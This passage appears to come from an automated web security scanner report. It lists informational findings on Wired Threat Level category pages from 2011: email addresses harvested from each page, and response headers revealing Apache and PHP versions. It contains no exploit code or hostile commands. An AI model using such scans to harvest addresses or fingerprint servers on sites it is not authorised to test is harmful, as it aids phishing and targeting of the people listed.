<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.36. http://www.wired.com/threatlevel/category/announcements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/announcements/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.37. http://www.wired.com/threatlevel/category/atm-hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/atm-hacking/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.38. http://www.wired.com/threatlevel/category/bittorrent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bittorrent/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.39. http://www.wired.com/threatlevel/category/black-hat-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/black-hat-conference/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.40. http://www.wired.com/threatlevel/category/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bradley-manning/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.41. http://www.wired.com/threatlevel/category/breaches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/breaches/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
msoaresds@uol.com.br
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:33 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=260
Expires: Wed, 12 Jan 2011 15:32:57 GMT
Date: Wed, 12 Jan 2011 15:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:msoaresds@uol.com.br">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.42. http://www.wired.com/threatlevel/category/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/censorship/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.43. http://www.wired.com/threatlevel/category/chaos-computer-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/chaos-computer-club/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.44. http://www.wired.com/threatlevel/category/conferences/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/conferences/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
paul_fisher@condenast.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:paul_fisher@condenast.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.45. http://www.wired.com/threatlevel/category/copyrights-and-patents/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/copyrights-and-patents/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.46. http://www.wired.com/threatlevel/category/coverups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/coverups/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.47. http://www.wired.com/threatlevel/category/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crime/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.48. http://www.wired.com/threatlevel/category/crypto/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crypto/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.49. http://www.wired.com/threatlevel/category/cybarmageddon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybarmageddon/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.50. http://www.wired.com/threatlevel/category/cyber-warfare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyber-warfare/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
